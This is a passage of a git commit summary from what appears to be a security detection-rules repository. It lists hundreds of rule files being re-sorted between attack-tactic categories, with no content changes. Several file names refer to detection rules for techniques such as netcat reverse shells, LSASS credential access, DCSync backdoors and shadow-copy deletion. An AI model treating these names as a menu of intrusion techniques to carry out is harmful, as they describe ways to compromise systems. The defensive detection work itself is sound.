...ithub_repo_created.toml => execution_github_repo_created.toml} | 0 ...ip.toml => execution_github_repo_interaction_from_new_ip.toml} | 0 ...eation.toml => execution_settingcontent_ms_file_creation.toml} | 0 ...oml => initial_access_anomalous_rsc_flight_data_patterns.toml} | 0 ...pat.toml => initial_access_github_new_ip_address_for_pat.toml} | 0 ....toml => initial_access_okta_admin_console_login_failure.toml} | 0 .../{execution_at.toml => lateral_movement_at.toml} | 0 ...rm_activity.toml => lateral_movement_posh_winrm_activity.toml} | 0 ...ts.toml => lateral_movement_unusual_process_sql_accounts.toml} | 0 ...ecution_wmic_remote.toml => lateral_movement_wmic_remote.toml} | 0 ...pat_for_user.toml => persistence_github_new_pat_for_user.toml} | 0 ...n.toml => persistence_web_server_potential_sql_injection.toml} | 0 ...e.toml => privilege_escalation_sts_getsessiontoken_abuse.toml} | 0 321 files changed, 0 insertions(+), 0 deletions(-) rename rules/cross-platform/{persistence_genai_config_modification.toml => defense_evasion_genai_config_modification.toml} (100%) rename rules/cross-platform/{resource_development_genai_process_compiling_executables.toml => defense_evasion_genai_process_compiling_executables.toml} (100%) rename rules/cross-platform/{collection_genai_process_encoding_prior_to_network_activity.toml => defense_evasion_genai_process_encoding_prior_to_network_activity.toml} (100%) rename rules/cross-platform/{defense_evasion_virtual_machine_fingerprinting_grep.toml => discovery_virtual_machine_fingerprinting_grep.toml} (100%) rename rules/cross-platform/{collection_azure_o365_with_network_alert.toml => initial_access_azure_o365_with_network_alert.toml} (100%) rename rules/cross-platform/{initial_access_web_server_potential_command_injection.toml => persistence_web_server_potential_command_injection.toml} (100%) rename rules/cross-platform/{persistence_trap_execution.toml => privilege_escalation_trap_execution.toml} (100%) rename rules/integrations/aws/{defense_evasion_cloudtrail_logging_created.toml => collection_cloudtrail_logging_created.toml} (100%) rename rules/integrations/aws/{persistence_iam_user_addition_to_group.toml => credential_access_iam_user_addition_to_group.toml} (100%) rename rules/integrations/aws/{collection_rds_instance_restored.toml => defense_evasion_rds_instance_restored.toml} (100%) rename rules/integrations/aws/{impact_s3_bucket_lifecycle_expiration_added.toml => defense_evasion_s3_bucket_lifecycle_expiration_added.toml} (100%) rename rules/integrations/aws/{impact_sqs_purge_queue.toml => defense_evasion_sqs_purge_queue.toml} (100%) rename rules/integrations/aws/{persistence_sts_get_federation_token.toml => defense_evasion_sts_get_federation_token.toml} (100%) rename rules/integrations/aws/{defense_evasion_lambda_external_layer_added_to_function.toml => execution_lambda_external_layer_added_to_function.toml} (100%) rename rules/integrations/aws/{collection_dynamodb_scan_by_unusual_user.toml => exfiltration_dynamodb_scan_by_unusual_user.toml} (100%) rename rules/integrations/aws/{discovery_ec2_full_network_packet_capture_detected.toml => exfiltration_ec2_full_network_packet_capture_detected.toml} (100%) rename rules/integrations/aws/{collection_rds_snapshot_export.toml => exfiltration_rds_snapshot_export.toml} (100%) rename rules/integrations/aws/{persistence_s3_bucket_policy_added_for_external_account_access.toml => exfiltration_s3_bucket_policy_added_for_external_account_access.toml} (100%) rename rules/integrations/aws/{defense_evasion_s3_bucket_policy_added_for_public_access.toml => exfiltration_s3_bucket_policy_added_for_public_access.toml} (100%) rename rules/integrations/aws/{defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml => impact_aws_eventbridge_rule_disabled_or_deleted.toml} (100%) rename rules/integrations/aws/{discovery_aws_s3_bucket_enumeration_or_brute_force.toml => impact_aws_s3_bucket_enumeration_or_brute_force.toml} (100%) rename rules/integrations/aws/{defense_evasion_cloudtrail_logging_updated.toml => impact_cloudtrail_logging_updated.toml} (100%) rename rules/integrations/aws/{defense_evasion_cloudwatch_log_group_deletion.toml => impact_cloudwatch_log_group_deletion.toml} (100%) rename rules/integrations/aws/{defense_evasion_cloudwatch_log_stream_deletion.toml => impact_cloudwatch_log_stream_deletion.toml} (100%) rename rules/integrations/aws/{defense_evasion_ec2_disable_ebs_encryption.toml => impact_ec2_disable_ebs_encryption.toml} (100%) rename rules/integrations/aws/{defense_evasion_iam_deactivate_mfa_device.toml => impact_iam_deactivate_mfa_device.toml} (100%) rename rules/integrations/aws/{defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml => impact_rds_instance_cluster_deletion_protection_disabled.toml} (100%) rename rules/integrations/aws/{persistence_ec2_instance_connect_ssh_public_key_uploaded.toml => lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml} (100%) rename rules/integrations/aws/{initial_access_ec2_instance_console_login.toml => lateral_movement_ec2_instance_console_login.toml} (100%) rename rules/integrations/aws/{exfiltration_sns_topic_message_publish_by_rare_user.toml => lateral_movement_sns_topic_message_publish_by_rare_user.toml} (100%) rename rules/integrations/aws/{defense_evasion_ec2_network_acl_creation.toml => persistence_ec2_network_acl_creation.toml} (100%) rename rules/integrations/aws/{defense_evasion_ec2_route_table_modified_or_deleted.toml => persistence_ec2_route_table_modified_or_deleted.toml} (100%) rename rules/integrations/aws/{defense_evasion_ec2_security_group_configuration_change_detection.toml => persistence_ec2_security_group_configuration_change_detection.toml} (100%) rename rules/integrations/aws/{defense_evasion_iam_api_calls_via_user_session_token.toml => persistence_iam_api_calls_via_user_session_token.toml} (100%) rename rules/integrations/aws/{privilege_escalation_iam_oidc_provider_created.toml => persistence_iam_oidc_provider_created.toml} (100%) rename rules/integrations/aws/{defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml => persistence_lambda_backdoor_invoke_function_for_any_principal.toml} (100%) rename rules/integrations/aws/{defense_evasion_rds_instance_made_public.toml => persistence_rds_instance_made_public.toml} (100%) rename rules/integrations/aws/{defense_evasion_route_53_domain_transfer_lock_disabled.toml => persistence_route_53_domain_transfer_lock_disabled.toml} (100%) rename rules/integrations/aws/{resource_development_route_53_domain_transferred_to_another_account.toml => persistence_route_53_domain_transferred_to_another_account.toml} (100%) rename rules/integrations/aws/{defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml => persistence_route_53_hosted_zone_associated_with_a_vpc.toml} (100%) rename rules/integrations/aws/{defense_evasion_route_table_created.toml => persistence_route_table_created.toml} (100%) rename rules/integrations/aws/{persistence_iam_administratoraccess_policy_attached_to_group.toml => privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml} (100%) rename rules/integrations/aws/{persistence_iam_administratoraccess_policy_attached_to_role.toml => privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml} (100%) rename rules/integrations/aws/{persistence_iam_administratoraccess_policy_attached_to_user.toml => privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml} (100%) rename rules/integrations/aws/{persistence_iam_customer_managed_policy_attached_to_role.toml => privilege_escalation_iam_customer_managed_policy_attached_to_role.toml} (100%) rename rules/integrations/aws/{defense_evasion_iam_saml_provider_updated.toml => privilege_escalation_iam_saml_provider_updated.toml} (100%) rename rules/integrations/aws/{persistence_iam_update_assume_role_policy.toml => privilege_escalation_iam_update_assume_role_policy.toml} (100%) rename rules/integrations/aws/{persistence_sts_role_chaining.toml => privilege_escalation_sts_role_chaining.toml} (100%) rename rules/integrations/aws/{impact_sns_topic_created_by_rare_user.toml => resource_development_sns_topic_created_by_rare_user.toml} (100%) rename rules/integrations/azure/{collection_key_vault_excessive_retrieval.toml => credential_access_key_vault_excessive_retrieval.toml} (100%) rename rules/integrations/azure/{persistence_storage_account_key_regenerated.toml => credential_access_storage_account_key_regenerated.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_teamfiltration_user_agents_detected.toml => discovery_entra_id_teamfiltration_user_agents_detected.toml} (100%) rename rules/integrations/azure/{defense_evasion_storage_blob_container_access_modification.toml => discovery_storage_blob_container_access_modification.toml} (100%) rename rules/integrations/azure/{collection_azure_storage_blob_download_azcopy_sas_token.toml => exfiltration_azure_storage_blob_download_azcopy_sas_token.toml} (100%) rename rules/integrations/azure/{credential_access_azure_arc_cluster_credential_access_unusual_source.toml => initial_access_azure_arc_cluster_credential_access_unusual_source.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml => initial_access_entra_id_actor_token_user_impersonation_abuse.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_device_code_auth_with_broker_client.toml => initial_access_entra_id_device_code_auth_with_broker_client.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_external_guest_user_invite.toml => initial_access_entra_id_external_guest_user_invite.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_federated_login_by_unusual_client.toml => initial_access_entra_id_federated_login_by_unusual_client.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml => initial_access_entra_id_graph_single_session_from_multiple_addresses.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_illicit_consent_grant_via_registered_application.toml => initial_access_entra_id_illicit_consent_grant_via_registered_application.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml => initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml => initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_protection_sign_in_risk_detected.toml => initial_access_entra_id_protection_sign_in_risk_detected.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_rare_app_id_for_principal_auth.toml => initial_access_entra_id_rare_app_id_for_principal_auth.toml} (100%) rename rules/integrations/azure/{credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml => initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml} (100%) rename rules/integrations/azure/{defense_evasion_graph_first_occurrence_of_client_request.toml => initial_access_graph_first_occurrence_of_client_request.toml} (100%) rename rules/integrations/azure/{defense_evasion_automation_account_created.toml => persistence_automation_account_created.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_conditional_access_policy_modified.toml => persistence_entra_id_conditional_access_policy_modified.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_mfa_disabled_for_user.toml => persistence_entra_id_mfa_disabled_for_user.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_privileged_identity_management_role_modified.toml => persistence_entra_id_privileged_identity_management_role_modified.toml} (100%) rename rules/integrations/azure/{defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml => persistence_entra_id_tenant_domain_federation_via_audit_logs.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_user_signed_in_from_unusual_device.toml => persistence_entra_id_user_signed_in_from_unusual_device.toml} (100%) rename rules/integrations/azure/{defense_evasion_graph_eam_addition_or_modification.toml => persistence_graph_eam_addition_or_modification.toml} (100%) rename rules/integrations/azure/{persistence_azure_rbac_administrator_roles_assigned.toml => privilege_escalation_azure_rbac_administrator_roles_assigned.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_elevate_to_user_administrator_access.toml => privilege_escalation_entra_id_elevate_to_user_administrator_access.toml} (100%) rename rules/integrations/azure/{persistence_kubernetes_aks_rolebinding_created.toml => privilege_escalation_kubernetes_aks_rolebinding_created.toml} (100%) rename rules/integrations/ded/{command_and_control_ml_high_bytes_destination_port.toml => exfiltration_ml_high_bytes_destination_port.toml} (100%) rename rules/integrations/gcp/{impact_gcp_pub_sub_subscription_deletion.toml => defense_evasion_gcp_pub_sub_subscription_deletion.toml} (100%) rename rules/integrations/gcp/{impact_gcp_pub_sub_topic_deletion.toml => defense_evasion_gcp_pub_sub_topic_deletion.toml} (100%) rename rules/integrations/gcp/{persistence_gcp_storage_bucket_permissions_modified.toml => defense_evasion_gcp_storage_bucket_permissions_modified.toml} (100%) rename rules/integrations/gcp/{impact_gcp_virtual_private_cloud_network_deleted.toml => defense_evasion_gcp_virtual_private_cloud_network_deleted.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_logging_sink_modification.toml => exfiltration_gcp_logging_sink_modification.toml} (100%) rename rules/integrations/gcp/{persistence_gcp_iam_custom_role_creation.toml => initial_access_gcp_iam_custom_role_creation.toml} (100%) rename rules/integrations/gcp/{impact_gcp_iam_service_account_key_deletion.toml => persistence_gcp_iam_service_account_key_deletion.toml} (100%) rename rules/integrations/github/{defense_evasion_github_app_deleted.toml => execution_github_app_deleted.toml} (100%) rename rules/integrations/github/{collection_github_high_number_of_cloned_repos_from_pat.toml => execution_github_high_number_of_cloned_repos_from_pat.toml} (100%) rename rules/integrations/github/{persistence_new_github_app_installed.toml => execution_new_github_app_installed.toml} (100%) rename rules/integrations/github/{collection_high_number_of_cloning_by_user.toml => exfiltration_high_number_of_cloning_by_user.toml} (100%) rename rules/integrations/github/{collection_github_repository_activity_from_unusual_ip.toml => impact_github_repository_activity_from_unusual_ip.toml} (100%) rename rules/integrations/github/{impact_github_actions_bot_first_push_to_repo.toml => initial_access_github_actions_bot_first_push_to_repo.toml} (100%) rename rules/integrations/google_workspace/{exfiltration_google_drive_ownership_transferred_via_google_workspace.toml => collection_google_drive_ownership_transferred_via_google_workspace.toml} (100%) rename rules/integrations/google_workspace/{collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml => credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml} (100%) rename rules/integrations/google_workspace/{credential_access_google_workspace_mfa_enforcement_disabled.toml => impact_google_workspace_mfa_enforcement_disabled.toml} (100%) rename rules/integrations/google_workspace/{persistence_external_user_added_to_google_workspace_group.toml => initial_access_external_user_added_to_google_workspace_group.toml} (100%) rename rules/integrations/google_workspace/{persistence_google_workspace_suspended_user_renewed.toml => initial_access_google_workspace_suspended_user_renewed.toml} (100%) rename rules/integrations/google_workspace/{execution_object_copied_to_external_drive_with_app_consent.toml => initial_access_object_copied_to_external_drive_with_app_consent.toml} (100%) rename rules/integrations/google_workspace/{defense_evasion_google_workspace_2sv_policy_disabled.toml => persistence_google_workspace_2sv_policy_disabled.toml} (100%) rename rules/integrations/google_workspace/{defense_evasion_google_workspace_password_policy_modified.toml => persistence_google_workspace_password_policy_modified.toml} (100%) rename rules/integrations/google_workspace/{defense_evasion_mfa_disabled_for_google_workspace_organization.toml => persistence_mfa_disabled_for_google_workspace_organization.toml} (100%) rename rules/integrations/kubernetes/{defense_evasion_denied_service_account_request.toml => discovery_denied_service_account_request.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_forbidden_creation_request.toml => execution_forbidden_creation_request.toml} (100%) rename rules/integrations/kubernetes/{discovery_forbidden_request_from_unsual_user_agent.toml => execution_forbidden_request_from_unsual_user_agent.toml} (100%) rename rules/integrations/kubernetes/{discovery_unusual_request_response_by_user_agent.toml => execution_unusual_request_response_by_user_agent.toml} (100%) rename rules/integrations/kubernetes/{initial_access_exposed_service_created_with_type_nodeport.toml => persistence_exposed_service_created_with_type_nodeport.toml} (100%) rename rules/integrations/kubernetes/{execution_container_created_with_excessive_linux_capabilities.toml => privilege_escalation_container_created_with_excessive_linux_capabilities.toml} (100%) rename rules/integrations/kubernetes/{execution_pod_created_with_hostipc.toml => privilege_escalation_pod_created_with_hostipc.toml} (100%) rename rules/integrations/kubernetes/{execution_pod_created_with_hostnetwork.toml => privilege_escalation_pod_created_with_hostnetwork.toml} (100%) rename rules/integrations/kubernetes/{execution_pod_created_with_hostpid.toml => privilege_escalation_pod_created_with_hostpid.toml} (100%) rename rules/integrations/kubernetes/{execution_pod_created_with_sensitive_hostpath_volume.toml => privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml} (100%) rename rules/integrations/kubernetes/{execution_privileged_pod_created.toml => privilege_escalation_privileged_pod_created.toml} (100%) rename rules/integrations/kubernetes/{execution_sensitive_rbac_change_followed_by_workload_modification.toml => privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml} (100%) rename rules/integrations/kubernetes/{execution_sensitive_workload_modification_by_user_agent.toml => privilege_escalation_sensitive_workload_modification_by_user_agent.toml} (100%) rename rules/integrations/kubernetes/{persistence_service_account_rbac_write_operation.toml => privilege_escalation_service_account_rbac_write_operation.toml} (100%) rename rules/integrations/kubernetes/{execution_suspicious_assignment_of_controller_service_account.toml => privilege_escalation_suspicious_assignment_of_controller_service_account.toml} (100%) rename rules/integrations/lmd/{execution_ml_high_mean_rdp_process_args.toml => lateral_movement_ml_high_mean_rdp_process_args.toml} (100%) rename rules/integrations/lmd/{exfiltration_ml_spike_in_remote_file_transfers.toml => lateral_movement_ml_spike_in_remote_file_transfers.toml} (100%) rename rules/integrations/o365/{collection_sharepoint_sensitive_term_search.toml => discovery_sharepoint_sensitive_term_search.toml} (100%) rename rules/integrations/o365/{collection_exchange_transport_rule_creation.toml => exfiltration_exchange_transport_rule_creation.toml} (100%) rename rules/integrations/o365/{defense_evasion_exchange_transport_rule_modification.toml => exfiltration_exchange_transport_rule_modification.toml} (100%) rename rules/integrations/o365/{persistence_identity_illicit_consent_grant_via_registered_application.toml => initial_access_identity_illicit_consent_grant_via_registered_application.toml} (100%) rename rules/integrations/o365/{credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml => initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml} (100%) rename rules/integrations/o365/{credential_access_identity_unusual_sso_errors_for_user.toml => initial_access_identity_unusual_sso_errors_for_user.toml} (100%) rename rules/integrations/o365/{defense_evasion_exchange_new_or_modified_federation_domain.toml => privilege_escalation_exchange_new_or_modified_federation_domain.toml} (100%) rename rules/integrations/o365/{persistence_sharepoint_site_collection_admin_added.toml => privilege_escalation_sharepoint_site_collection_admin_added.toml} (100%) rename rules/integrations/okta/{defense_evasion_multiple_user_agent_os_authentication.toml => credential_access_multiple_user_agent_os_authentication.toml} (100%) rename rules/integrations/okta/{defense_evasion_okta_aitm_session_cookie_replay.toml => credential_access_okta_aitm_session_cookie_replay.toml} (100%) rename rules/integrations/okta/{defense_evasion_user_impersonation_access.toml => credential_access_user_impersonation_access.toml} (100%) rename rules/integrations/okta/{initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml => defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml} (100%) rename rules/integrations/okta/{defense_evasion_okta_attempt_to_deactivate_okta_application.toml => impact_okta_attempt_to_deactivate_okta_application.toml} (100%) rename rules/integrations/okta/{defense_evasion_okta_attempt_to_modify_okta_application.toml => impact_okta_attempt_to_modify_okta_application.toml} (100%) rename rules/integrations/okta/{defense_evasion_sign_in_events_via_third_party_idp.toml => initial_access_sign_in_events_via_third_party_idp.toml} (100%) rename rules/integrations/okta/{defense_evasion_successful_application_sso_from_unknown_client_device.toml => initial_access_successful_application_sso_from_unknown_client_device.toml} (100%) rename rules/integrations/okta/{defense_evasion_multiple_sessions_for_single_user.toml => lateral_movement_multiple_sessions_for_single_user.toml} (100%) rename rules/integrations/okta/{defense_evasion_mfa_deactivation_with_no_reactivation.toml => persistence_mfa_deactivation_with_no_reactivation.toml} (100%) rename rules/integrations/okta/{defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml => persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml} (100%) rename rules/integrations/okta/{defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml => persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml} (100%) rename rules/macos/{execution_perl_outbound_network_connection.toml => command_and_control_perl_outbound_network_connection.toml} (100%) rename rules/macos/{collection_high_volume_of_pbpaste.toml => credential_access_high_volume_of_pbpaste.toml} (100%) rename rules/macos/{collection_suspicious_tcc_access_granted.toml => defense_evasion_suspicious_tcc_access_granted.toml} (100%) rename rules/macos/{defense_evasion_suspicious_sip_check.toml => discovery_suspicious_sip_check.toml} (100%) rename rules/macos/{command_and_control_installer_package_spawned_network_event.toml => execution_installer_package_spawned_network_event.toml} (100%) rename rules/macos/{command_and_control_scripting_osascript_exec_followed_by_netcon.toml => execution_scripting_osascript_exec_followed_by_netcon.toml} (100%) rename rules/macos/{execution_suspicious_mac_ms_office_child_process.toml => initial_access_suspicious_mac_ms_office_child_process.toml} (100%) rename rules/macos/{persistence_remote_ssh_login_enabled.toml => lateral_movement_remote_ssh_login_enabled.toml} (100%) rename rules/macos/{initial_access_vpn_connection_attempt.toml => lateral_movement_vpn_connection_attempt.toml} (100%) rename rules/macos/{defense_evasion_account_creation_hide_at_logon.toml => persistence_account_creation_hide_at_logon.toml} (100%) rename rules/macos/{command_and_control_curl_execution_via_shell_profile.toml => persistence_curl_execution_via_shell_profile.toml} (100%) rename rules/macos/{defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml => persistence_evasion_hidden_launch_agent_deamon_creation.toml} (100%) rename rules/macos/{defense_evasion_hidden_plist_filename.toml => persistence_hidden_plist_filename.toml} (100%) rename rules/macos/{execution_applescript_with_admin_privs.toml => privilege_escalation_applescript_with_admin_privs.toml} (100%) rename rules/macos/{execution_explicit_creds_via_scripting.toml => privilege_escalation_explicit_creds_via_scripting.toml} (100%) rename rules/macos/{persistence_local_user_added_to_admin.toml => privilege_escalation_local_user_added_to_admin.toml} (100%) rename rules/macos/{persistence_root_crontab_filemod.toml => privilege_escalation_root_crontab_filemod.toml} (100%) rename rules/macos/{persistence_user_added_to_admin_group.toml => privilege_escalation_user_added_to_admin_group.toml} (100%) rename rules/ml/{defense_evasion_ml_windows_anomalous_script.toml => execution_ml_windows_anomalous_script.toml} (100%) rename rules/ml/{execution_ml_rare_process_by_host_linux.toml => persistence_ml_rare_process_by_host_linux.toml} (100%) rename rules/ml/{execution_ml_windows_anomalous_path_activity.toml => persistence_ml_windows_anomalous_path_activity.toml} (100%) rename rules/ml/{execution_ml_windows_anomalous_process_creation.toml => persistence_ml_windows_anomalous_process_creation.toml} (100%) rename rules/network/{initial_access_accepted_default_telnet_port_connection.toml => command_and_control_accepted_default_telnet_port_connection.toml} (100%) rename rules/network/{initial_access_rdp_remote_desktop_protocol_from_the_internet.toml => command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml} (100%) rename rules/network/{initial_access_vnc_virtual_network_computing_from_the_internet.toml => command_and_control_vnc_virtual_network_computing_from_the_internet.toml} (100%) rename rules/network/{execution_react_server_components_rce_attempt.toml => initial_access_react_server_components_rce_attempt.toml} (100%) rename rules/network/{command_and_control_rpc_remote_procedure_call_to_the_internet.toml => initial_access_rpc_remote_procedure_call_to_the_internet.toml} (100%) rename rules/network/{exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml => initial_access_smb_windows_file_sharing_activity_to_the_internet.toml} (100%) rename rules/network/{reconnaissance_unsecure_elasticsearch_node.toml => initial_access_unsecure_elasticsearch_node.toml} (100%) rename rules/promotions/{defense_evasion_endgame_cred_manipulation_detected.toml => privilege_escalation_endgame_cred_manipulation_detected.toml} (100%) rename rules/promotions/{defense_evasion_endgame_cred_manipulation_prevented.toml => privilege_escalation_endgame_cred_manipulation_prevented.toml} (100%) rename rules/promotions/{defense_evasion_endgame_permission_theft_detected.toml => privilege_escalation_endgame_permission_theft_detected.toml} (100%) rename rules/promotions/{defense_evasion_endgame_permission_theft_prevented.toml => privilege_escalation_endgame_permission_theft_prevented.toml} (100%) rename rules/promotions/{defense_evasion_endgame_process_injection_detected.toml => privilege_escalation_endgame_process_injection_detected.toml} (100%) rename rules/promotions/{defense_evasion_endgame_process_injection_prevented.toml => privilege_escalation_endgame_process_injection_prevented.toml} (100%) rename rules/windows/{persistence_outlook_home_page.toml => command_and_control_outlook_home_page.toml} (100%) rename rules/windows/{collection_adidns_wildcard.toml => credential_access_adidns_wildcard.toml} (100%) rename rules/windows/{collection_browsers_unusual_parent.toml => credential_access_browsers_unusual_parent.toml} (100%) rename rules/windows/{persistence_dcsync_user_backdoor.toml => credential_access_dcsync_user_backdoor.toml} (100%) rename rules/windows/{collection_dnsnode_creation.toml => credential_access_dnsnode_creation.toml} (100%) rename rules/windows/{persistence_lsass_loaded_susp_dll.toml => credential_access_lsass_loaded_susp_dll.toml} (100%) rename rules/windows/{persistence_seenabledelegationprivilege_assigned_to_user.toml => credential_access_seenabledelegationprivilege_assigned_to_user.toml} (100%) rename rules/windows/{persistence_shadow_credentials.toml => credential_access_shadow_credentials.toml} (100%) rename rules/windows/{persistence_spn_attribute_modified.toml => credential_access_spn_attribute_modified.toml} (100%) rename rules/windows/{collection_web_config_file_access.toml => credential_access_web_config_file_access.toml} (100%) rename rules/windows/{persistence_masquerading_suspicious_werfault_childproc.toml => defense_evasion_masquerading_suspicious_werfault_childproc.toml} (100%) rename rules/windows/{command_and_control_msiexec_remote_payload.toml => defense_evasion_msiexec_remote_payload.toml} (100%) rename rules/windows/{persistence_regmod_remotemonologue.toml => defense_evasion_regmod_remotemonologue.toml} (100%) rename rules/windows/{persistence_scheduledjobs_at_protocol_enabled.toml => defense_evasion_scheduledjobs_at_protocol_enabled.toml} (100%) rename rules/windows/{command_and_control_suspicious_certutil_commands.toml => defense_evasion_suspicious_certutil_commands.toml} (100%) rename rules/windows/{execution_suspicious_process_access_direct_syscall.toml => defense_evasion_suspicious_process_access_direct_syscall.toml} (100%) rename rules/windows/{execution_suspicious_zoom_child_process.toml => defense_evasion_suspicious_zoom_child_process.toml} (100%) rename rules/windows/{command_and_control_unusual_network_connection_via_dllhost.toml => defense_evasion_unusual_network_connection_via_dllhost.toml} (100%) rename rules/windows/{command_and_control_unusual_network_connection_via_rundll32.toml => defense_evasion_unusual_network_connection_via_rundll32.toml} (100%) rename rules/windows/{execution_wsl_bash_exec.toml => defense_evasion_wsl_bash_exec.toml} (100%) rename rules/windows/{defense_evasion_com_object_xwizard.toml => execution_com_object_xwizard.toml} (100%) rename rules/windows/{command_and_control_command_prompt_connecting_to_the_internet.toml => execution_command_prompt_connecting_to_the_internet.toml} (100%) rename rules/windows/{defense_evasion_command_shell_via_rundll32.toml => execution_command_shell_via_rundll32.toml} (100%) rename rules/windows/{defense_evasion_delayed_via_ping_lolbas_unsigned.toml => execution_delayed_via_ping_lolbas_unsigned.toml} (100%) rename rules/windows/{initial_access_downloaded_shortcut_files.toml => execution_downloaded_shortcut_files.toml} (100%) rename rules/windows/{initial_access_downloaded_url_file.toml => execution_downloaded_url_file.toml} (100%) rename rules/windows/{discovery_enumeration_via_wmiprvse.toml => execution_enumeration_via_wmiprvse.toml} (100%) rename rules/windows/{defense_evasion_from_unusual_path_cmdline.toml => execution_from_unusual_path_cmdline.toml} (100%) rename rules/windows/{defense_evasion_html_help_executable_program_connecting_to_the_internet.toml => execution_html_help_executable_program_connecting_to_the_internet.toml} (100%) rename rules/windows/{credential_access_posh_hacktool_functions.toml => execution_posh_hacktool_functions.toml} (100%) rename rules/windows/{defense_evasion_posh_portable_executable.toml => execution_posh_portable_executable.toml} (100%) rename rules/windows/{defense_evasion_register_server_program_connecting_to_the_internet.toml => execution_register_server_program_connecting_to_the_internet.toml} (100%) rename rules/windows/{command_and_control_revshell_cmd_via_netcat.toml => execution_revshell_cmd_via_netcat.toml} (100%) rename rules/windows/{command_and_control_scripting_remote_webdav.toml => execution_scripting_remote_webdav.toml} (100%) rename rules/windows/{persistence_shared_modules_local_sxs_dll.toml => execution_shared_modules_local_sxs_dll.toml} (100%) rename rules/windows/{defense_evasion_suspicious_psexesvc.toml => execution_suspicious_psexesvc.toml} (100%) rename rules/windows/{defense_evasion_via_compiled_html_file.toml => execution_via_compiled_html_file.toml} (100%) rename rules/windows/{defense_evasion_via_hidden_shell_conhost.toml => execution_via_hidden_shell_conhost.toml} (100%) rename rules/windows/{defense_evasion_via_mmc_console_file_unusual_path.toml => execution_via_mmc_console_file_unusual_path.toml} (100%) rename rules/windows/{defense_evasion_windows_cmd_shell_susp_args.toml => execution_windows_cmd_shell_susp_args.toml} (100%) rename rules/windows/{defense_evasion_windows_fakecaptcha_cmd_ps.toml => execution_windows_fakecaptcha_cmd_ps.toml} (100%) rename rules/windows/{defense_evasion_windows_powershell_susp_args.toml => execution_windows_powershell_susp_args.toml} (100%) rename rules/windows/{defense_evasion_windows_script_from_internet.toml => execution_windows_script_from_internet.toml} (100%) rename rules/windows/{credential_access_smb_rare_destination.toml => exfiltration_smb_rare_destination.toml} (100%) rename rules/windows/{execution_volume_shadow_copy_deletion_via_powershell.toml => impact_volume_shadow_copy_deletion_via_powershell.toml} (100%) rename rules/windows/{execution_volume_shadow_copy_deletion_via_wmic.toml => impact_volume_shadow_copy_deletion_via_wmic.toml} (100%) rename rules/windows/{defense_evasion_evasion_suspicious_htm_file_creation.toml => initial_access_evasion_suspicious_htm_file_creation.toml} (100%) rename rules/windows/{defense_evasion_exploit_jetbrains_teamcity.toml => initial_access_exploit_jetbrains_teamcity.toml} (100%) rename rules/windows/{defense_evasion_potential_webhelpdesk_exploit.toml => initial_access_potential_webhelpdesk_exploit.toml} (100%) rename rules/windows/{execution_rdp_file_mail_attachment.toml => initial_access_rdp_file_mail_attachment.toml} (100%) rename rules/windows/{execution_script_executing_powershell.toml => initial_access_script_executing_powershell.toml} (100%) rename rules/windows/{execution_scripts_process_started_via_wmi.toml => initial_access_scripts_process_started_via_wmi.toml} (100%) rename rules/windows/{defense_evasion_suspicious_execution_from_vscode_extension.toml => initial_access_suspicious_execution_from_vscode_extension.toml} (100%) rename rules/windows/{execution_suspicious_ms_exchange_worker_child_process.toml => initial_access_suspicious_ms_exchange_worker_child_process.toml} (100%) rename rules/windows/{defense_evasion_suspicious_ms_office_child_process.toml => initial_access_suspicious_ms_office_child_process.toml} (100%) rename rules/windows/{execution_suspicious_ms_outlook_child_process.toml => initial_access_suspicious_ms_outlook_child_process.toml} (100%) rename rules/windows/{defense_evasion_suspicious_windows_server_update_svc.toml => initial_access_suspicious_windows_server_update_svc.toml} (100%) rename rules/windows/{defense_evasion_url_cve_2025_33053.toml => initial_access_url_cve_2025_33053.toml} (100%) rename rules/windows/{execution_via_explorer_suspicious_child_parent_args.toml => 